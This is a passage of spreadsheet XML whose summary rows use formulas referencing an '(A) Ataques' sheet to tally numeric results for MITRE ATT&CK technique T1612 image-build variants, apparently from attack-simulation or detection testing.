        <f>IF('(A) Ataques'!$AK106&lt;&gt;"NO",IF($P106=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U106" s="322">
        <f>IF('(A) Ataques'!$AK106&lt;&gt;"NO",'(A) Ataques'!$BT106,"")</f>
        <v>792</v>
      </c>
      <c r="V106" s="322">
        <f>IF('(A) Ataques'!$AK106&lt;&gt;"NO",'(A) Ataques'!$BV106,"")</f>
        <v>2</v>
      </c>
      <c r="W106" s="4">
        <f>IF('(A) Ataques'!$AK106&lt;&gt;"NO",'(A) Ataques'!$BX106,"")</f>
        <v>2</v>
      </c>
      <c r="X106" s="20">
        <f>IF('(A) Ataques'!$AK106&lt;&gt;"NO",'(A) Ataques'!$BY106,"")</f>
        <v>1</v>
      </c>
      <c r="Y106" s="532">
        <f>IF('(A) Ataques'!$AK106&lt;&gt;"NO",IF($U106=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z106" s="288">
        <f>IF('(A) Ataques'!$AK106&lt;&gt;"NO",'(A) Ataques'!BZ106,"")</f>
        <v>796</v>
      </c>
      <c r="AA106" s="392">
        <f>IF('(A) Ataques'!$AK106&lt;&gt;"NO",'(A) Ataques'!CB106,"")</f>
        <v>4</v>
      </c>
      <c r="AB106" s="4">
        <f>IF('(A) Ataques'!$AK106&lt;&gt;"NO",'(A) Ataques'!CD106,"")</f>
        <v>4</v>
      </c>
      <c r="AC106" s="20">
        <f>IF('(A) Ataques'!$AK106&lt;&gt;"NO",'(A) Ataques'!CE106,"")</f>
        <v>1</v>
      </c>
      <c r="AD106" s="331">
        <f>IF('(A) Ataques'!$AK106&lt;&gt;"NO",IF(Z106=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE106" s="322">
        <f>IF('(A) Ataques'!$AK106&lt;&gt;"NO",'(A) Ataques'!$CF106,"")</f>
        <v>1588</v>
      </c>
      <c r="AF106" s="322">
        <f>IF('(A) Ataques'!$AK106&lt;&gt;"NO",'(A) Ataques'!$CH106,"")</f>
        <v>6</v>
      </c>
      <c r="AG106" s="4">
        <f>IF('(A) Ataques'!$AK106&lt;&gt;"NO",'(A) Ataques'!$CJ106,"")</f>
        <v>6</v>
      </c>
      <c r="AH106" s="20">
        <f>IF('(A) Ataques'!$AK106&lt;&gt;"NO",'(A) Ataques'!$CK106,"")</f>
        <v>1</v>
      </c>
      <c r="AI106" s="287">
        <f>IF('(A) Ataques'!$AK106&lt;&gt;"NO",IF($AE106=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ106" s="292">
        <f>IF('(A) Ataques'!$AK106&lt;&gt;"NO",'(A) Ataques'!$CL106,"")</f>
        <v>0</v>
      </c>
      <c r="AK106" s="322">
        <f>IF('(A) Ataques'!$AK106&lt;&gt;"NO",'(A) Ataques'!$CN106,"")</f>
        <v>0</v>
      </c>
      <c r="AL106" s="4">
        <f>IF('(A) Ataques'!$AK106&lt;&gt;"NO",'(A) Ataques'!$CP106,"")</f>
        <v>0</v>
      </c>
      <c r="AM106" s="20">
        <f>IF('(A) Ataques'!$AK106&lt;&gt;"NO",'(A) Ataques'!$CQ106,"")</f>
        <v>0</v>
      </c>
      <c r="AN106" s="331">
        <f>IF('(A) Ataques'!$AK106&lt;&gt;"NO",IF($AJ106=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO106" s="322">
        <f>IF('(A) Ataques'!$AK106&lt;&gt;"NO",'(A) Ataques'!$CR106,"")</f>
        <v>792</v>
      </c>
      <c r="AP106" s="322">
        <f>IF('(A) Ataques'!$AK106&lt;&gt;"NO",'(A) Ataques'!$CT106,"")</f>
        <v>2</v>
      </c>
      <c r="AQ106" s="4">
        <f>IF('(A) Ataques'!$AK106&lt;&gt;"NO",'(A) Ataques'!$CV106,"")</f>
        <v>2</v>
      </c>
      <c r="AR106" s="20">
        <f>IF('(A) Ataques'!$AK106&lt;&gt;"NO",'(A) Ataques'!$CW106,"")</f>
        <v>1</v>
      </c>
      <c r="AS106" s="287">
        <f>IF('(A) Ataques'!$AK106&lt;&gt;"NO",IF($AO106=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT106" s="288">
        <f>IF('(A) Ataques'!$AK106&lt;&gt;"NO",'(A) Ataques'!CX106,"")</f>
        <v>1188</v>
      </c>
      <c r="AU106" s="392">
        <f>IF('(A) Ataques'!$AK106&lt;&gt;"NO",'(A) Ataques'!CZ106,"")</f>
        <v>3</v>
      </c>
      <c r="AV106" s="4">
        <f>IF('(A) Ataques'!$AK106&lt;&gt;"NO",'(A) Ataques'!DB106,"")</f>
        <v>3</v>
      </c>
      <c r="AW106" s="20">
        <f>IF('(A) Ataques'!$AK106&lt;&gt;"NO",'(A) Ataques'!DC106,"")</f>
        <v>1</v>
      </c>
      <c r="AX106" s="331">
        <f>IF('(A) Ataques'!$AK106&lt;&gt;"NO",IF($AT106=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY106" s="469">
        <f>'(A) Ataques'!LU106+'(A) Ataques'!MA106+'(A) Ataques'!MG106+'(A) Ataques'!MM106+'(A) Ataques'!MS106</f>
        <v>0</v>
      </c>
      <c r="AZ106" s="510">
        <f>'(A) Ataques'!LW106+'(A) Ataques'!MC106+'(A) Ataques'!MI106+'(A) Ataques'!MO106+'(A) Ataques'!MU106</f>
        <v>0</v>
      </c>
      <c r="BA106" s="471">
        <f>'(A) Ataques'!LY106+'(A) Ataques'!ME106+'(A) Ataques'!MK106+'(A) Ataques'!MQ106+'(A) Ataques'!MW106</f>
        <v>0</v>
      </c>
      <c r="BB106" s="471">
        <f>'(A) Ataques'!LQ106</f>
        <v>0</v>
      </c>
      <c r="BC106" s="331">
        <f>IF('(A) Ataques'!$AK106&lt;&gt;"NO",IF($AY106=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BD106" s="469">
        <f>IF('(A) Ataques'!$AP106&lt;&gt;"NO",'(A) Ataques'!LL106,"")</f>
        <v>3</v>
      </c>
      <c r="BE106" s="510">
        <f>IF('(A) Ataques'!$AP106&lt;&gt;"NO",'(A) Ataques'!LM106,"")</f>
        <v>3</v>
      </c>
      <c r="BF106" s="471">
        <f>IF('(A) Ataques'!$AP106&lt;&gt;"NO",'(A) Ataques'!LN106,"")</f>
        <v>0</v>
      </c>
      <c r="BG106" s="471">
        <f>IF('(A) Ataques'!$AP106&lt;&gt;"NO",'(A) Ataques'!LO106,"")</f>
        <v>3</v>
      </c>
      <c r="BH106" s="471">
        <f>IF('(A) Ataques'!$AP106&lt;&gt;"NO",'(A) Ataques'!LS106,"")</f>
        <v>1</v>
      </c>
      <c r="BI106" s="331">
        <f>IF('(A) Ataques'!$AK106&lt;&gt;"NO",IF($BD106=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ106" s="469">
        <f>'(A) Ataques'!OL106+'(A) Ataques'!OR106+'(A) Ataques'!OX106+'(A) Ataques'!PD106+'(A) Ataques'!PJ106</f>
        <v>1</v>
      </c>
      <c r="BK106" s="510">
        <f>'(A) Ataques'!ON106+'(A) Ataques'!OT106+'(A) Ataques'!OZ106+'(A) Ataques'!PF106+'(A) Ataques'!PL106</f>
        <v>1</v>
      </c>
      <c r="BL106" s="471">
        <f>'(A) Ataques'!OP106+'(A) Ataques'!OV106+'(A) Ataques'!PB106+'(A) Ataques'!PH106+'(A) Ataques'!PN106</f>
        <v>1</v>
      </c>
      <c r="BM106" s="495">
        <f>'(A) Ataques'!OH106</f>
        <v>1</v>
      </c>
      <c r="BN106" s="331">
        <f>IF('(A) Ataques'!$AK106&lt;&gt;"NO",IF($BJ106=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO106" s="469">
        <f>IF('(A) Ataques'!$AP106&lt;&gt;"NO",'(A) Ataques'!OC106,"")</f>
        <v>1</v>
      </c>
      <c r="BP106" s="510">
        <f>IF('(A) Ataques'!$AP106&lt;&gt;"NO",'(A) Ataques'!OD106,"")</f>
        <v>1</v>
      </c>
      <c r="BQ106" s="471">
        <f>IF('(A) Ataques'!$AP106&lt;&gt;"NO",'(A) Ataques'!OE106,"")</f>
        <v>1</v>
      </c>
      <c r="BR106" s="471">
        <f>IF('(A) Ataques'!$AP106&lt;&gt;"NO",'(A) Ataques'!OF106,"")</f>
        <v>1</v>
      </c>
      <c r="BS106" s="471">
        <f>IF('(A) Ataques'!$AP106&lt;&gt;"NO",'(A) Ataques'!OJ106,"")</f>
        <v>1</v>
      </c>
      <c r="BT106" s="331">
        <f>IF('(A) Ataques'!$AK106&lt;&gt;"NO",IF($BO106=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="107" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A107" s="79">
        <f t="shared" si="1"/>
        <v>105</v>
      </c>
      <c r="B107" s="4">
        <f>IF('(A) Ataques'!AK107&lt;&gt;"NO",'(A) Ataques'!E107,"")</f>
        <v>72</v>
      </c>
      <c r="C107" s="6" t="str">
        <f>IF('(A) Ataques'!AK107&lt;&gt;"NO",IF('(A) Ataques'!M107="","",'(A) Ataques'!M107),"")</f>
        <v>T1612-BuildImageOnHostLocal</v>
      </c>
      <c r="D107" s="4" t="str">
        <f>IF('(A) Ataques'!AK107&lt;&gt;"NO",'(A) Ataques'!F107,"")</f>
        <v>T1612</v>
      </c>
      <c r="E107" s="286">
        <f>IF('(A) Ataques'!AK107&lt;&gt;"NO",'(A) Ataques'!AQ107,"")</f>
        <v>69</v>
      </c>
      <c r="F107" s="288">
        <f>IF('(A) Ataques'!$AK107&lt;&gt;"NO",'(A) Ataques'!BB107,"")</f>
        <v>24</v>
      </c>
      <c r="G107" s="392">
        <f>IF('(A) Ataques'!$AK107&lt;&gt;"NO",'(A) Ataques'!BD107,"")</f>
        <v>2</v>
      </c>
      <c r="H107" s="4">
        <f>IF('(A) Ataques'!$AK107&lt;&gt;"NO",'(A) Ataques'!BF107,"")</f>
        <v>1</v>
      </c>
      <c r="I107" s="20">
        <f>IF('(A) Ataques'!$AK107&lt;&gt;"NO",'(A) Ataques'!BG107,"")</f>
        <v>2</v>
      </c>
      <c r="J107" s="530">
        <f>IF('(A) Ataques'!$AK107&lt;&gt;"NO",IF($F107=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K107" s="322">
        <f>IF('(A) Ataques'!$AK107&lt;&gt;"NO",'(A) Ataques'!$BH107,"")</f>
        <v>2</v>
      </c>
      <c r="L107" s="322">
        <f>IF('(A) Ataques'!$AK107&lt;&gt;"NO",'(A) Ataques'!$BJ107,"")</f>
        <v>2</v>
      </c>
      <c r="M107" s="4">
        <f>IF('(A) Ataques'!$AK107&lt;&gt;"NO",'(A) Ataques'!$BL107,"")</f>
        <v>2</v>
      </c>
      <c r="N107" s="20">
        <f>IF('(A) Ataques'!$AK107&lt;&gt;"NO",'(A) Ataques'!$BM107,"")</f>
        <v>2</v>
      </c>
      <c r="O107" s="532">
        <f>IF('(A) Ataques'!$AK107&lt;&gt;"NO",IF($K107=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P107" s="292">
        <f>IF('(A) Ataques'!$AK107&lt;&gt;"NO",'(A) Ataques'!$BN107,"")</f>
        <v>26</v>
      </c>
      <c r="Q107" s="322">
        <f>IF('(A) Ataques'!$AK107&lt;&gt;"NO",'(A) Ataques'!$BP107,"")</f>
        <v>4</v>
      </c>
      <c r="R107" s="4">
        <f>IF('(A) Ataques'!$AK107&lt;&gt;"NO",'(A) Ataques'!$BR107,"")</f>
        <v>3</v>
      </c>
      <c r="S107" s="20">
        <f>IF('(A) Ataques'!$AK107&lt;&gt;"NO",'(A) Ataques'!$BS107,"")</f>
        <v>3</v>
      </c>
      <c r="T107" s="530">
        <f>IF('(A) Ataques'!$AK107&lt;&gt;"NO",IF($P107=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U107" s="322">
        <f>IF('(A) Ataques'!$AK107&lt;&gt;"NO",'(A) Ataques'!$BT107,"")</f>
        <v>34</v>
      </c>
      <c r="V107" s="322">
        <f>IF('(A) Ataques'!$AK107&lt;&gt;"NO",'(A) Ataques'!$BV107,"")</f>
        <v>12</v>
      </c>
      <c r="W107" s="4">
        <f>IF('(A) Ataques'!$AK107&lt;&gt;"NO",'(A) Ataques'!$BX107,"")</f>
        <v>4</v>
      </c>
      <c r="X107" s="20">
        <f>IF('(A) Ataques'!$AK107&lt;&gt;"NO",'(A) Ataques'!$BY107,"")</f>
        <v>11</v>
      </c>
      <c r="Y107" s="532">
        <f>IF('(A) Ataques'!$AK107&lt;&gt;"NO",IF($U107=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z107" s="288">
        <f>IF('(A) Ataques'!$AK107&lt;&gt;"NO",'(A) Ataques'!BZ107,"")</f>
        <v>18</v>
      </c>
      <c r="AA107" s="392">
        <f>IF('(A) Ataques'!$AK107&lt;&gt;"NO",'(A) Ataques'!CB107,"")</f>
        <v>18</v>
      </c>
      <c r="AB107" s="4">
        <f>IF('(A) Ataques'!$AK107&lt;&gt;"NO",'(A) Ataques'!CD107,"")</f>
        <v>6</v>
      </c>
      <c r="AC107" s="20">
        <f>IF('(A) Ataques'!$AK107&lt;&gt;"NO",'(A) Ataques'!CE107,"")</f>
        <v>10</v>
      </c>
      <c r="AD107" s="331">
        <f>IF('(A) Ataques'!$AK107&lt;&gt;"NO",IF(Z107=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE107" s="322">
        <f>IF('(A) Ataques'!$AK107&lt;&gt;"NO",'(A) Ataques'!$CF107,"")</f>
        <v>52</v>
      </c>
      <c r="AF107" s="322">
        <f>IF('(A) Ataques'!$AK107&lt;&gt;"NO",'(A) Ataques'!$CH107,"")</f>
        <v>30</v>
      </c>
      <c r="AG107" s="4">
        <f>IF('(A) Ataques'!$AK107&lt;&gt;"NO",'(A) Ataques'!$CJ107,"")</f>
        <v>10</v>
      </c>
      <c r="AH107" s="20">
        <f>IF('(A) Ataques'!$AK107&lt;&gt;"NO",'(A) Ataques'!$CK107,"")</f>
        <v>19</v>
      </c>
      <c r="AI107" s="287">
        <f>IF('(A) Ataques'!$AK107&lt;&gt;"NO",IF($AE107=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ107" s="292">
        <f>IF('(A) Ataques'!$AK107&lt;&gt;"NO",'(A) Ataques'!$CL107,"")</f>
        <v>0</v>
      </c>
      <c r="AK107" s="322">
        <f>IF('(A) Ataques'!$AK107&lt;&gt;"NO",'(A) Ataques'!$CN107,"")</f>
        <v>0</v>
      </c>
      <c r="AL107" s="4">
        <f>IF('(A) Ataques'!$AK107&lt;&gt;"NO",'(A) Ataques'!$CP107,"")</f>
        <v>0</v>
      </c>
      <c r="AM107" s="20">
        <f>IF('(A) Ataques'!$AK107&lt;&gt;"NO",'(A) Ataques'!$CQ107,"")</f>
        <v>0</v>
      </c>
      <c r="AN107" s="331">
        <f>IF('(A) Ataques'!$AK107&lt;&gt;"NO",IF($AJ107=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO107" s="322">
        <f>IF('(A) Ataques'!$AK107&lt;&gt;"NO",'(A) Ataques'!$CR107,"")</f>
        <v>1</v>
      </c>
      <c r="AP107" s="322">
        <f>IF('(A) Ataques'!$AK107&lt;&gt;"NO",'(A) Ataques'!$CT107,"")</f>
        <v>1</v>
      </c>
      <c r="AQ107" s="4">
        <f>IF('(A) Ataques'!$AK107&lt;&gt;"NO",'(A) Ataques'!$CV107,"")</f>
        <v>1</v>
      </c>
      <c r="AR107" s="20">
        <f>IF('(A) Ataques'!$AK107&lt;&gt;"NO",'(A) Ataques'!$CW107,"")</f>
        <v>1</v>
      </c>
      <c r="AS107" s="287">
        <f>IF('(A) Ataques'!$AK107&lt;&gt;"NO",IF($AO107=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT107" s="288">
        <f>IF('(A) Ataques'!$AK107&lt;&gt;"NO",'(A) Ataques'!CX107,"")</f>
        <v>27</v>
      </c>
      <c r="AU107" s="392">
        <f>IF('(A) Ataques'!$AK107&lt;&gt;"NO",'(A) Ataques'!CZ107,"")</f>
        <v>5</v>
      </c>
      <c r="AV107" s="4">
        <f>IF('(A) Ataques'!$AK107&lt;&gt;"NO",'(A) Ataques'!DB107,"")</f>
        <v>4</v>
      </c>
      <c r="AW107" s="20">
        <f>IF('(A) Ataques'!$AK107&lt;&gt;"NO",'(A) Ataques'!DC107,"")</f>
        <v>3</v>
      </c>
      <c r="AX107" s="331">
        <f>IF('(A) Ataques'!$AK107&lt;&gt;"NO",IF($AT107=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY107" s="469">
        <f>'(A) Ataques'!LU107+'(A) Ataques'!MA107+'(A) Ataques'!MG107+'(A) Ataques'!MM107+'(A) Ataques'!MS107</f>
        <v>1</v>
      </c>
      <c r="AZ107" s="510">
        <f>'(A) Ataques'!LW107+'(A) Ataques'!MC107+'(A) Ataques'!MI107+'(A) Ataques'!MO107+'(A) Ataques'!MU107</f>
        <v>1</v>
      </c>
      <c r="BA107" s="471">
        <f>'(A) Ataques'!LY107+'(A) Ataques'!ME107+'(A) Ataques'!MK107+'(A) Ataques'!MQ107+'(A) Ataques'!MW107</f>
        <v>1</v>
      </c>
      <c r="BB107" s="471">
        <f>'(A) Ataques'!LQ107</f>
        <v>1</v>
      </c>
      <c r="BC107" s="331">
        <f>IF('(A) Ataques'!$AK107&lt;&gt;"NO",IF($AY107=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD107" s="469">
        <f>IF('(A) Ataques'!$AP107&lt;&gt;"NO",'(A) Ataques'!LL107,"")</f>
        <v>36</v>
      </c>
      <c r="BE107" s="510">
        <f>IF('(A) Ataques'!$AP107&lt;&gt;"NO",'(A) Ataques'!LM107,"")</f>
        <v>36</v>
      </c>
      <c r="BF107" s="471">
        <f>IF('(A) Ataques'!$AP107&lt;&gt;"NO",'(A) Ataques'!LN107,"")</f>
        <v>1</v>
      </c>
      <c r="BG107" s="471">
        <f>IF('(A) Ataques'!$AP107&lt;&gt;"NO",'(A) Ataques'!LO107,"")</f>
        <v>4</v>
      </c>
      <c r="BH107" s="471">
        <f>IF('(A) Ataques'!$AP107&lt;&gt;"NO",'(A) Ataques'!LS107,"")</f>
        <v>34</v>
      </c>
      <c r="BI107" s="331">
        <f>IF('(A) Ataques'!$AK107&lt;&gt;"NO",IF($BD107=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ107" s="469">
        <f>'(A) Ataques'!OL107+'(A) Ataques'!OR107+'(A) Ataques'!OX107+'(A) Ataques'!PD107+'(A) Ataques'!PJ107</f>
        <v>5</v>
      </c>
      <c r="BK107" s="510">
        <f>'(A) Ataques'!ON107+'(A) Ataques'!OT107+'(A) Ataques'!OZ107+'(A) Ataques'!PF107+'(A) Ataques'!PL107</f>
        <v>5</v>
      </c>
      <c r="BL107" s="471">
        <f>'(A) Ataques'!OP107+'(A) Ataques'!OV107+'(A) Ataques'!PB107+'(A) Ataques'!PH107+'(A) Ataques'!PN107</f>
        <v>5</v>
      </c>
      <c r="BM107" s="495">
        <f>'(A) Ataques'!OH107</f>
        <v>3</v>
      </c>
      <c r="BN107" s="331">
        <f>IF('(A) Ataques'!$AK107&lt;&gt;"NO",IF($BJ107=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO107" s="469">
        <f>IF('(A) Ataques'!$AP107&lt;&gt;"NO",'(A) Ataques'!OC107,"")</f>
        <v>5</v>
      </c>
      <c r="BP107" s="510">
        <f>IF('(A) Ataques'!$AP107&lt;&gt;"NO",'(A) Ataques'!OD107,"")</f>
        <v>5</v>
      </c>
      <c r="BQ107" s="471">
        <f>IF('(A) Ataques'!$AP107&lt;&gt;"NO",'(A) Ataques'!OE107,"")</f>
        <v>5</v>
      </c>
      <c r="BR107" s="471">
        <f>IF('(A) Ataques'!$AP107&lt;&gt;"NO",'(A) Ataques'!OF107,"")</f>
        <v>4</v>
      </c>
      <c r="BS107" s="471">
        <f>IF('(A) Ataques'!$AP107&lt;&gt;"NO",'(A) Ataques'!OJ107,"")</f>
        <v>3</v>
      </c>
      <c r="BT107" s="331">
        <f>IF('(A) Ataques'!$AK107&lt;&gt;"NO",IF($BO107=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="108" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A108" s="79">
        <f t="shared" si="1"/>
        <v>106</v>
      </c>
      <c r="B108" s="4">
        <f>IF('(A) Ataques'!AK108&lt;&gt;"NO",'(A) Ataques'!E108,"")</f>
        <v>72</v>
      </c>
      <c r="C108" s="6" t="str">
        <f>IF('(A) Ataques'!AK108&lt;&gt;"NO",IF('(A) Ataques'!M108="","",'(A) Ataques'!M108),"")</f>
        <v>T1612-BuildImageOnHostNAT</v>
      </c>
      <c r="D108" s="4" t="str">
        <f>IF('(A) Ataques'!AK108&lt;&gt;"NO",'(A) Ataques'!F108,"")</f>
        <v>T1612</v>
      </c>
      <c r="E108" s="286">
        <f>IF('(A) Ataques'!AK108&lt;&gt;"NO",'(A) Ataques'!AQ108,"")</f>
        <v>119</v>
      </c>
      <c r="F108" s="288">
        <f>IF('(A) Ataques'!$AK108&lt;&gt;"NO",'(A) Ataques'!BB108,"")</f>
        <v>90</v>
      </c>
      <c r="G108" s="392">
        <f>IF('(A) Ataques'!$AK108&lt;&gt;"NO",'(A) Ataques'!BD108,"")</f>
        <v>63</v>
      </c>
      <c r="H108" s="4">
        <f>IF('(A) Ataques'!$AK108&lt;&gt;"NO",'(A) Ataques'!BF108,"")</f>
        <v>6</v>
      </c>
      <c r="I108" s="20">
        <f>IF('(A) Ataques'!$AK108&lt;&gt;"NO",'(A) Ataques'!BG108,"")</f>
        <v>21</v>
      </c>
      <c r="J108" s="530">
        <f>IF('(A) Ataques'!$AK108&lt;&gt;"NO",IF($F108=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K108" s="322">
        <f>IF('(A) Ataques'!$AK108&lt;&gt;"NO",'(A) Ataques'!$BH108,"")</f>
        <v>157</v>
      </c>
      <c r="L108" s="322">
        <f>IF('(A) Ataques'!$AK108&lt;&gt;"NO",'(A) Ataques'!$BJ108,"")</f>
        <v>10</v>
      </c>
      <c r="M108" s="4">
        <f>IF('(A) Ataques'!$AK108&lt;&gt;"NO",'(A) Ataques'!$BL108,"")</f>
        <v>1</v>
      </c>
      <c r="N108" s="20">
        <f>IF('(A) Ataques'!$AK108&lt;&gt;"NO",'(A) Ataques'!$BM108,"")</f>
        <v>10</v>
      </c>
      <c r="O108" s="532">
        <f>IF('(A) Ataques'!$AK108&lt;&gt;"NO",IF($K108=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P108" s="292">
        <f>IF('(A) Ataques'!$AK108&lt;&gt;"NO",'(A) Ataques'!$BN108,"")</f>
        <v>247</v>
      </c>
      <c r="Q108" s="322">
        <f>IF('(A) Ataques'!$AK108&lt;&gt;"NO",'(A) Ataques'!$BP108,"")</f>
        <v>73</v>
      </c>
      <c r="R108" s="4">
        <f>IF('(A) Ataques'!$AK108&lt;&gt;"NO",'(A) Ataques'!$BR108,"")</f>
        <v>7</v>
      </c>
      <c r="S108" s="20">
        <f>IF('(A) Ataques'!$AK108&lt;&gt;"NO",'(A) Ataques'!$BS108,"")</f>
        <v>31</v>
      </c>
      <c r="T108" s="530">
        <f>IF('(A) Ataques'!$AK108&lt;&gt;"NO",IF($P108=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U108" s="322">
        <f>IF('(A) Ataques'!$AK108&lt;&gt;"NO",'(A) Ataques'!$BT108,"")</f>
        <v>93</v>
      </c>
      <c r="V108" s="322">
        <f>IF('(A) Ataques'!$AK108&lt;&gt;"NO",'(A) Ataques'!$BV108,"")</f>
        <v>66</v>
      </c>
      <c r="W108" s="4">
        <f>IF('(A) Ataques'!$AK108&lt;&gt;"NO",'(A) Ataques'!$BX108,"")</f>
        <v>7</v>
      </c>
      <c r="X108" s="20">
        <f>IF('(A) Ataques'!$AK108&lt;&gt;"NO",'(A) Ataques'!$BY108,"")</f>
        <v>24</v>
      </c>
      <c r="Y108" s="532">
        <f>IF('(A) Ataques'!$AK108&lt;&gt;"NO",IF($U108=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z108" s="288">
        <f>IF('(A) Ataques'!$AK108&lt;&gt;"NO",'(A) Ataques'!BZ108,"")</f>
        <v>291</v>
      </c>
      <c r="AA108" s="392">
        <f>IF('(A) Ataques'!$AK108&lt;&gt;"NO",'(A) Ataques'!CB108,"")</f>
        <v>79</v>
      </c>
      <c r="AB108" s="4">
        <f>IF('(A) Ataques'!$AK108&lt;&gt;"NO",'(A) Ataques'!CD108,"")</f>
        <v>5</v>
      </c>
      <c r="AC108" s="20">
        <f>IF('(A) Ataques'!$AK108&lt;&gt;"NO",'(A) Ataques'!CE108,"")</f>
        <v>73</v>
      </c>
      <c r="AD108" s="331">
        <f>IF('(A) Ataques'!$AK108&lt;&gt;"NO",IF(Z108=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE108" s="322">
        <f>IF('(A) Ataques'!$AK108&lt;&gt;"NO",'(A) Ataques'!$CF108,"")</f>
        <v>384</v>
      </c>
      <c r="AF108" s="322">
        <f>IF('(A) Ataques'!$AK108&lt;&gt;"NO",'(A) Ataques'!$CH108,"")</f>
        <v>145</v>
      </c>
      <c r="AG108" s="4">
        <f>IF('(A) Ataques'!$AK108&lt;&gt;"NO",'(A) Ataques'!$CJ108,"")</f>
        <v>12</v>
      </c>
      <c r="AH108" s="20">
        <f>IF('(A) Ataques'!$AK108&lt;&gt;"NO",'(A) Ataques'!$CK108,"")</f>
        <v>90</v>
      </c>
      <c r="AI108" s="287">
        <f>IF('(A) Ataques'!$AK108&lt;&gt;"NO",IF($AE108=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ108" s="292">
        <f>IF('(A) Ataques'!$AK108&lt;&gt;"NO",'(A) Ataques'!$CL108,"")</f>
        <v>0</v>
      </c>
      <c r="AK108" s="322">
        <f>IF('(A) Ataques'!$AK108&lt;&gt;"NO",'(A) Ataques'!$CN108,"")</f>
        <v>0</v>
      </c>
      <c r="AL108" s="4">
        <f>IF('(A) Ataques'!$AK108&lt;&gt;"NO",'(A) Ataques'!$CP108,"")</f>
        <v>0</v>
      </c>
      <c r="AM108" s="20">
        <f>IF('(A) Ataques'!$AK108&lt;&gt;"NO",'(A) Ataques'!$CQ108,"")</f>
        <v>0</v>
      </c>
      <c r="AN108" s="331">
        <f>IF('(A) Ataques'!$AK108&lt;&gt;"NO",IF($AJ108=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO108" s="322">
        <f>IF('(A) Ataques'!$AK108&lt;&gt;"NO",'(A) Ataques'!$CR108,"")</f>
        <v>3</v>
      </c>
      <c r="AP108" s="322">
        <f>IF('(A) Ataques'!$AK108&lt;&gt;"NO",'(A) Ataques'!$CT108,"")</f>
        <v>3</v>
      </c>
      <c r="AQ108" s="4">
        <f>IF('(A) Ataques'!$AK108&lt;&gt;"NO",'(A) Ataques'!$CV108,"")</f>
        <v>1</v>
      </c>
      <c r="AR108" s="20">
        <f>IF('(A) Ataques'!$AK108&lt;&gt;"NO",'(A) Ataques'!$CW108,"")</f>
        <v>3</v>
      </c>
      <c r="AS108" s="287">
        <f>IF('(A) Ataques'!$AK108&lt;&gt;"NO",IF($AO108=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT108" s="288">
        <f>IF('(A) Ataques'!$AK108&lt;&gt;"NO",'(A) Ataques'!CX108,"")</f>
        <v>250</v>
      </c>
      <c r="AU108" s="392">
        <f>IF('(A) Ataques'!$AK108&lt;&gt;"NO",'(A) Ataques'!CZ108,"")</f>
        <v>76</v>
      </c>
      <c r="AV108" s="4">
        <f>IF('(A) Ataques'!$AK108&lt;&gt;"NO",'(A) Ataques'!DB108,"")</f>
        <v>8</v>
      </c>
      <c r="AW108" s="20">
        <f>IF('(A) Ataques'!$AK108&lt;&gt;"NO",'(A) Ataques'!DC108,"")</f>
        <v>34</v>
      </c>
      <c r="AX108" s="331">
        <f>IF('(A) Ataques'!$AK108&lt;&gt;"NO",IF($AT108=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY108" s="469">
        <f>'(A) Ataques'!LU108+'(A) Ataques'!MA108+'(A) Ataques'!MG108+'(A) Ataques'!MM108+'(A) Ataques'!MS108</f>
        <v>48</v>
      </c>
      <c r="AZ108" s="510">
        <f>'(A) Ataques'!LW108+'(A) Ataques'!MC108+'(A) Ataques'!MI108+'(A) Ataques'!MO108+'(A) Ataques'!MU108</f>
        <v>32</v>
      </c>
      <c r="BA108" s="471">
        <f>'(A) Ataques'!LY108+'(A) Ataques'!ME108+'(A) Ataques'!MK108+'(A) Ataques'!MQ108+'(A) Ataques'!MW108</f>
        <v>2</v>
      </c>
      <c r="BB108" s="471">
        <f>'(A) Ataques'!LQ108</f>
        <v>29</v>
      </c>
      <c r="BC108" s="331">
        <f>IF('(A) Ataques'!$AK108&lt;&gt;"NO",IF($AY108=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD108" s="469">
        <f>IF('(A) Ataques'!$AP108&lt;&gt;"NO",'(A) Ataques'!LL108,"")</f>
        <v>156</v>
      </c>
      <c r="BE108" s="510">
        <f>IF('(A) Ataques'!$AP108&lt;&gt;"NO",'(A) Ataques'!LM108,"")</f>
        <v>140</v>
      </c>
      <c r="BF108" s="471">
        <f>IF('(A) Ataques'!$AP108&lt;&gt;"NO",'(A) Ataques'!LN108,"")</f>
        <v>2</v>
      </c>
      <c r="BG108" s="471">
